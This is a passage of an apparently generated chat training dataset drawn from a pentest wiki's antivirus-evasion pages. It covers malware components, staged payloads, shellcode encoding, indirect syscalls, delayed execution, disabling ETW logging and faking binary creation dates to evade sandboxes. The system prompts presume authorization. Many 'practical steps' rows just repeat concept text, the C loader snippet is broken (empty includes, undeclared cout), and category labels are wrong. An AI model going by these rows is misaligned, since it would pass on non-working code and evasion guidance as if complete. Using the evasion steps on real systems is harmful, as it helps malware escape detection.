legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through (AV) Anti-Virus - Theory", "response": "Most of the anti-virus vendors do not communicate much about the rules they put in place to block malicious software. Consequently, there are 3 main possible options to understand the underground process of an anti-virus:\n\n1. reverse the anti-virus binary\n2. search on the internet if there are any open source AVs that implement certain rules\n3. do regular monitoring\n\nNevertheless, here is a list of known techniques used by anti-viral protections on the market:\n\n* Static analysis: analysis of instructions and control statements in the code to detect known malware signatures.\n* Dynamic analysis: code execution in a virtual environment to detect suspicious behavior.\n* Heuristics: analysis of code characteristics to detect suspicious behavior.\n* Sandboxing: execution of code in a virtual environment to detect suspicious behavior.\n* Signature checking: comparison of suspicious files signature with a database of known malware signatures.\n* Fingerprinting: comparison of suspicious files with a database of known malware fingerprints.\n* Behavioral check: analysis of suspicious behavior of the executed code.\n* Network monitoring: analysis of suspicious network communications.\n* URL control: analysis of suspicious URLs.\n* File control: analysis of suspicious files.\n\n> [!CAUTION]\n> Some AVs have a browser extension that parses the html code for malicious code, be careful during red team operations\n\n> [!TIP]\n> Moreover, depending on the anti-virus installed on the victim's computer, it is possible that some techniques do not work and others do.\n> \n> Therefore, it is strongly advised to set up a virtual machine as close as possible to the victim's computer.", "metadata": {"corpus_index": 1353, "category": "network", "source_file": "docs/src/evasion/av/index.md", "page_title": "(AV) Anti-Virus", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about (AV) Anti-Virus - Droppers, loaders, stagers, handlers?"}, {"role": "assistant", "content": "When working with malwares, the are multiple components that have specific tasks. These components usually allow for better antivirus evasion and/or easier control over the malware's behavior (e.g. being able to control it from a Command & Control).\n\n| Component | Role |\n| --- | --- |\n| Dropper | Download/deliver a malicious payload to the victim's computer.Once the dropper has successfully installed the malware on the victim's computer, it may also attempt to establish a persistent presence on the system, such as by adding registry entries or creating hidden files. |\n| Loader | Load another program or code into memory. Often used to load the main payload of the malware into memory, after which the payload can execute and carry out its activities.Will often implement process injection techniques to inject the malicious code (i.e. shellcode) into a legitimate process running on a victim's system, with the intention of evading antivirus and other security solutions. |\n| Stager | Type of loader that loads the main payload of a malware program in multiple stages. Initial stage usually small and responsible for downloading additional stages of the malware from a remote server, or hiding the subsequent stages within the system. |\n| Handler | Receive and execute commands from a command and control (C&C) server. |\n\n> [!TIP]\n> Simple malwares can sometimes merge the dropper and loader parts into a single piece."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about (AV) Anti-Virus - Droppers, loaders, stagers, handlers?", "response": "When working with malwares, the are multiple components that have specific tasks. These components usually allow for better antivirus evasion and/or easier control over the malware's behavior (e.g. being able to control it from a Command & Control).\n\n| Component | Role |\n| --- | --- |\n| Dropper | Download/deliver a malicious payload to the victim's computer.Once the dropper has successfully installed the malware on the victim's computer, it may also attempt to establish a persistent presence on the system, such as by adding registry entries or creating hidden files. |\n| Loader | Load another program or code into memory. Often used to load the main payload of the malware into memory, after which the payload can execute and carry out its activities.Will often implement process injection techniques to inject the malicious code (i.e. shellcode) into a legitimate process running on a victim's system, with the intention of evading antivirus and other security solutions. |\n| Stager | Type of loader that loads the main payload of a malware program in multiple stages. Initial stage usually small and responsible for downloading additional stages of the malware from a remote server, or hiding the subsequent stages within the system. |\n| Handler | Receive and execute commands from a command and control (C&C) server. |\n\n> [!TIP]\n> Simple malwares can sometimes merge the dropper and loader parts into a single piece.", "metadata": {"corpus_index": 1354, "category": "network", "source_file": "docs/src/evasion/av/index.md", "page_title": "(AV) Anti-Virus", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for (AV) Anti-Virus - Droppers, loaders, stagers, handlers"}, {"role": "assistant", "content": "When working with malwares, the are multiple components that have specific tasks. These components usually allow for better antivirus evasion and/or easier control over the malware's behavior (e.g. being able to control it from a Command & Control).\n\n| Component | Role |\n| --- | --- |\n| Dropper | Download/deliver a malicious payload to the victim's computer.Once the dropper has successfully installed the malware on the victim's computer, it may also attempt to establish a persistent presence on the system, such as by adding registry entries or creating hidden files. |\n| Loader | Load another program or code into memory. Often used to load the main payload of the malware into memory, after which the payload can execute and carry out its activities.Will often implement process injection techniques to inject the malicious code (i.e. shellcode) into a legitimate process running on a victim's system, with the intention of evading antivirus and other security solutions. |\n| Stager | Type of loader that loads the main payload of a malware program in multiple stages. Initial stage usually small and responsible for downloading additional stages of the malware from a remote server, or hiding the subsequent stages within the system. |\n| Handler | Receive and execute commands from a command and control (C&C) server. |\n\n> [!TIP]\n> Simple malwares can sometimes merge the dropper and loader parts into a single piece."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for (AV) Anti-Virus - Droppers, loaders, stagers, handlers", "response": "When working with malwares, the are multiple components that have specific tasks. These components usually allow for better antivirus evasion and/or easier control over the malware's behavior (e.g. being able to control it from a Command & Control).\n\n| Component | Role |\n| --- | --- |\n| Dropper | Download/deliver a malicious payload to the victim's computer.Once the dropper has successfully installed the malware on the victim's computer, it may also attempt to establish a persistent presence on the system, such as by adding registry entries or creating hidden files. |\n| Loader | Load another program or code into memory. Often used to load the main payload of the malware into memory, after which the payload can execute and carry out its activities.Will often implement process injection techniques to inject the malicious code (i.e. shellcode) into a legitimate process running on a victim's system, with the intention of evading antivirus and other security solutions. |\n| Stager | Type of loader that loads the main payload of a malware program in multiple stages. Initial stage usually small and responsible for downloading additional stages of the malware from a remote server, or hiding the subsequent stages within the system. |\n| Handler | Receive and execute commands from a command and control (C&C) server. |\n\n> [!TIP]\n> Simple malwares can sometimes merge the dropper and loader parts into a single piece.", "metadata": {"corpus_index": 1354, "category": "network", "source_file": "docs/src/evasion/av/index.md", "page_title": "(AV) Anti-Virus", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is (AV) Anti-Virus - Staged vs. stageless?"}, {"role": "assistant", "content": "Staged malware is like a series of stepping stones where the initial piece of code downloads additional stages of the malware from a remote server. \n\nStageless malware, on the other hand, is more of a single file that contains all the malicious code and can execute directly on the victim's computer without needing to download additional stages.\n\n> [!TIP]\n> While staged malware is theoretically more likely to be caught, because it consists in more steps and actions than a stageless one, it could be designed in a way that each action appears benign or inconspicuous, hence evading antivirus software."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is (AV) Anti-Virus - Staged vs. stageless?", "response": "Staged malware is like a series of stepping stones where the initial piece of code downloads additional stages of the malware from a remote server. \n\nStageless malware, on the other hand, is more of a single file that contains all the malicious code and can execute directly on the victim's computer without needing to download additional stages.\n\n> [!TIP]\n> While staged malware is theoretically more likely to be caught, because it consists in more steps and actions than a stageless one, it could be designed in a way that each action appears benign or inconspicuous, hence evading antivirus software.", "metadata": {"corpus_index": 1355, "category": "network", "source_file": "docs/src/evasion/av/index.md", "page_title": "(AV) Anti-Virus", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through (AV) Anti-Virus - Staged vs. stageless"}, {"role": "assistant", "content": "Staged malware is like a series of stepping stones where the initial piece of code downloads additional stages of the malware from a remote server. \n\nStageless malware, on the other hand, is more of a single file that contains all the malicious code and can execute directly on the victim's computer without needing to download additional stages.\n\n> [!TIP]\n> While staged malware is theoretically more likely to be caught, because it consists in more steps and actions than a stageless one, it could be designed in a way that each action appears benign or inconspicuous, hence evading antivirus software."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through (AV) Anti-Virus - Staged vs. stageless", "response": "Staged malware is like a series of stepping stones where the initial piece of code downloads additional stages of the malware from a remote server. \n\nStageless malware, on the other hand, is more of a single file that contains all the malicious code and can execute directly on the victim's computer without needing to download additional stages.\n\n> [!TIP]\n> While staged malware is theoretically more likely to be caught, because it consists in more steps and actions than a stageless one, it could be designed in a way that each action appears benign or inconspicuous, hence evading antivirus software.", "metadata": {"corpus_index": 1355, "category": "network", "source_file": "docs/src/evasion/av/index.md", "page_title": "(AV) Anti-Virus", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Loader"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs\n\nThe following piece of C code is a simple example of DLL loader, where the DLL holds the malicious shellcode.\n\n``c\n#include \n#include \n\nint main(void) {\n HMODULE hMod = LoadLibrary(\"shellcode.dll\");\n if (hMod == nullptr) {\n cout << \"Failed to load shellcode.dll\" << endl;\n }\n\n return 0;\n}\n``\n\nOnce the payload is completed, pe-sieve can be used to identify if it is stealthy or not.\n\n![](./assets/ps-sieve.png)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Loader", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs\n\nThe following piece of C code is a simple example of DLL loader, where the DLL holds the malicious shellcode.\n\n``c\n#include \n#include \n\nint main(void) {\n HMODULE hMod = LoadLibrary(\"shellcode.dll\");\n if (hMod == nullptr) {\n cout << \"Failed to load shellcode.dll\" << endl;\n }\n\n return 0;\n}\n``\n\nOnce the payload is completed, pe-sieve can be used to identify if it is stealthy or not.\n\n![](./assets/ps-sieve.png)", "metadata": {"corpus_index": 1356, "category": "active_directory", "source_file": "docs/src/evasion/av/loader.md", "page_title": "🛠️ Loader", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Loader?"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs\n\nThe following piece of C code is a simple example of DLL loader, where the DLL holds the malicious shellcode.\n\n``c\n#include \n#include \n\nint main(void) {\n HMODULE hMod = LoadLibrary(\"shellcode.dll\");\n if (hMod == nullptr) {\n cout << \"Failed to load shellcode.dll\" << endl;\n }\n\n return 0;\n}\n``\n\nOnce the payload is completed, pe-sieve can be used to identify if it is stealthy or not.\n\n![](./assets/ps-sieve.png)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Loader?", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs\n\nThe following piece of C code is a simple example of DLL loader, where the DLL holds the malicious shellcode.\n\n``c\n#include \n#include \n\nint main(void) {\n HMODULE hMod = LoadLibrary(\"shellcode.dll\");\n if (hMod == nullptr) {\n cout << \"Failed to load shellcode.dll\" << endl;\n }\n\n return 0;\n}\n``\n\nOnce the payload is completed, pe-sieve can be used to identify if it is stealthy or not.\n\n![](./assets/ps-sieve.png)", "metadata": {"corpus_index": 1356, "category": "active_directory", "source_file": "docs/src/evasion/av/loader.md", "page_title": "🛠️ Loader", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use include for 🛠️ loader?"}, {"role": "assistant", "content": "#include \n#include \n\nint main(void) {\n HMODULE hMod = LoadLibrary(\"shellcode.dll\");\n if (hMod == nullptr) {\n cout << \"Failed to load shellcode.dll\" << endl;\n }\n\n return 0;\n}"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use include for 🛠️ loader?", "response": "#include \n#include \n\nint main(void) {\n HMODULE hMod = LoadLibrary(\"shellcode.dll\");\n if (hMod == nullptr) {\n cout << \"Failed to load shellcode.dll\" << endl;\n }\n\n return 0;\n}", "metadata": {"corpus_index": 1357, "category": "active_directory", "source_file": "docs/src/evasion/av/loader.md", "page_title": "🛠️ Loader", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "include"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Loader"}, {"role": "assistant", "content": "#include \n#include \n\nint main(void) {\n HMODULE hMod = LoadLibrary(\"shellcode.dll\");\n if (hMod == nullptr) {\n cout << \"Failed to load shellcode.dll\" << endl;\n }\n\n return 0;\n}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Loader", "response": "#include \n#include \n\nint main(void) {\n HMODULE hMod = LoadLibrary(\"shellcode.dll\");\n if (hMod == nullptr) {\n cout << \"Failed to load shellcode.dll\" << endl;\n }\n\n return 0;\n}", "metadata": {"corpus_index": 1357, "category": "active_directory", "source_file": "docs/src/evasion/av/loader.md", "page_title": "🛠️ Loader", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Obfuscation?"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Obfuscation?", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs", "metadata": {"corpus_index": 1358, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Obfuscation"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Obfuscation", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs", "metadata": {"corpus_index": 1358, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Obfuscation - Theory"}, {"role": "assistant", "content": "Obfuscation is a way to hide a shellcode. generally symmetric algorithms are used"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Obfuscation - Theory", "response": "Obfuscation is a way to hide a shellcode. generally symmetric algorithms are used", "metadata": {"corpus_index": 1359, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Obfuscation - Theory"}, {"role": "assistant", "content": "Obfuscation is a way to hide a shellcode. generally symmetric algorithms are used"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Obfuscation - Theory", "response": "Obfuscation is a way to hide a shellcode. generally symmetric algorithms are used", "metadata": {"corpus_index": 1359, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ Obfuscation - Manual obfuscation?"}, {"role": "assistant", "content": "Below is a list of ways that allow you to go under the radar of anti-virus software, so put all the chances on your side and use several techniques.\\\nYou should also change the logo of the binary as well as its description and its creation date (sandboxes check that the binary is not too recent)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ Obfuscation - Manual obfuscation?", "response": "Below is a list of ways that allow you to go under the radar of anti-virus software, so put all the chances on your side and use several techniques.\\\nYou should also change the logo of the binary as well as its description and its creation date (sandboxes check that the binary is not too recent).", "metadata": {"corpus_index": 1360, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Obfuscation - Manual obfuscation"}, {"role": "assistant", "content": "Below is a list of ways that allow you to go under the radar of anti-virus software, so put all the chances on your side and use several techniques.\\\nYou should also change the logo of the binary as well as its description and its creation date (sandboxes check that the binary is not too recent)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Obfuscation - Manual obfuscation", "response": "Below is a list of ways that allow you to go under the radar of anti-virus software, so put all the chances on your side and use several techniques.\\\nYou should also change the logo of the binary as well as its description and its creation date (sandboxes check that the binary is not too recent).", "metadata": {"corpus_index": 1360, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Obfuscation - Shellcode encoding"}, {"role": "assistant", "content": "For this part the principle is simple: camouflaged its active load, to do this you will need to code a function to encode, but also to decode, free to choose algorithm this technique works particularly well for static bypass.\n\nHere is a link that will allow you to understand and write your first program:\n\nhttps://www.ired.team/offensive-security/code-injection-process-injection/writing-custom-shellcode-encoders-and-decoders"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Obfuscation - Shellcode encoding", "response": "For this part the principle is simple: camouflaged its active load, to do this you will need to code a function to encode, but also to decode, free to choose algorithm this technique works particularly well for static bypass.\n\nHere is a link that will allow you to understand and write your first program:\n\nhttps://www.ired.team/offensive-security/code-injection-process-injection/writing-custom-shellcode-encoders-and-decoders", "metadata": {"corpus_index": 1361, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Obfuscation - Shellcode encoding during a pentest?"}, {"role": "assistant", "content": "For this part the principle is simple: camouflaged its active load, to do this you will need to code a function to encode, but also to decode, free to choose algorithm this technique works particularly well for static bypass.\n\nHere is a link that will allow you to understand and write your first program:\n\nhttps://www.ired.team/offensive-security/code-injection-process-injection/writing-custom-shellcode-encoders-and-decoders"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Obfuscation - Shellcode encoding during a pentest?", "response": "For this part the principle is simple: camouflaged its active load, to do this you will need to code a function to encode, but also to decode, free to choose algorithm this technique works particularly well for static bypass.\n\nHere is a link that will allow you to understand and write your first program:\n\nhttps://www.ired.team/offensive-security/code-injection-process-injection/writing-custom-shellcode-encoders-and-decoders", "metadata": {"corpus_index": 1361, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Obfuscation - Indirect syscall"}, {"role": "assistant", "content": "the principle of this method is to call directly the memory addresses instead of using the API functions an article which explains things very well is this one."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Obfuscation - Indirect syscall", "response": "the principle of this method is to call directly the memory addresses instead of using the API functions an article which explains things very well is this one.", "metadata": {"corpus_index": 1362, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Obfuscation - Indirect syscall?"}, {"role": "assistant", "content": "the principle of this method is to call directly the memory addresses instead of using the API functions an article which explains things very well is this one."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Obfuscation - Indirect syscall?", "response": "the principle of this method is to call directly the memory addresses instead of using the API functions an article which explains things very well is this one.", "metadata": {"corpus_index": 1362, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Obfuscation - Delayed execution work?"}, {"role": "assistant", "content": "In order to compromise the machine discreetly, sleeps are also used a lot, There are several methods: WaitForSingleObjectEx, Foliage, Ekko, Deathsleep.\n\nA good part of them are very well explained at the following address : https://evasions.checkpoint.com/techniques/timing.html#delayed-execution"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Obfuscation - Delayed execution work?", "response": "In order to compromise the machine discreetly, sleeps are also used a lot, There are several methods: WaitForSingleObjectEx, Foliage, Ekko, Deathsleep.\n\nA good part of them are very well explained at the following address : https://evasions.checkpoint.com/techniques/timing.html#delayed-execution", "metadata": {"corpus_index": 1363, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Obfuscation - Delayed execution"}, {"role": "assistant", "content": "In order to compromise the machine discreetly, sleeps are also used a lot, There are several methods: WaitForSingleObjectEx, Foliage, Ekko, Deathsleep.\n\nA good part of them are very well explained at the following address : https://evasions.checkpoint.com/techniques/timing.html#delayed-execution"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Obfuscation - Delayed execution", "response": "In order to compromise the machine discreetly, sleeps are also used a lot, There are several methods: WaitForSingleObjectEx, Foliage, Ekko, Deathsleep.\n\nA good part of them are very well explained at the following address : https://evasions.checkpoint.com/techniques/timing.html#delayed-execution", "metadata": {"corpus_index": 1363, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Obfuscation - Disable ETW"}, {"role": "assistant", "content": "There are several ways to disable logging, either via nt!EtwpStopTrace, or advapi32!EventWrite but also ntdll!ETWEventWrite.\n\nTo better understand these keywords, I invite you to read this article: https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html.\n\nAnother great resource : https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Obfuscation - Disable ETW", "response": "There are several ways to disable logging, either via nt!EtwpStopTrace, or advapi32!EventWrite but also ntdll!ETWEventWrite.\n\nTo better understand these keywords, I invite you to read this article: https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html.\n\nAnother great resource : https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/.", "metadata": {"corpus_index": 1364, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Obfuscation - Disable ETW?"}, {"role": "assistant", "content": "There are several ways to disable logging, either via nt!EtwpStopTrace, or advapi32!EventWrite but also ntdll!ETWEventWrite.\n\nTo better understand these keywords, I invite you to read this article: https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html.\n\nAnother great resource : https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Obfuscation - Disable ETW?", "response": "There are several ways to disable logging, either via nt!EtwpStopTrace, or advapi32!EventWrite but also ntdll!ETWEventWrite.\n\nTo better understand these keywords, I invite you to read this article: https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html.\n\nAnother great resource : https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/.", "metadata": {"corpus_index": 1364, "category": "web", "source_file": "docs/src/evasion/av/obfuscation.md", "page_title": "🛠️ Obfuscation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense 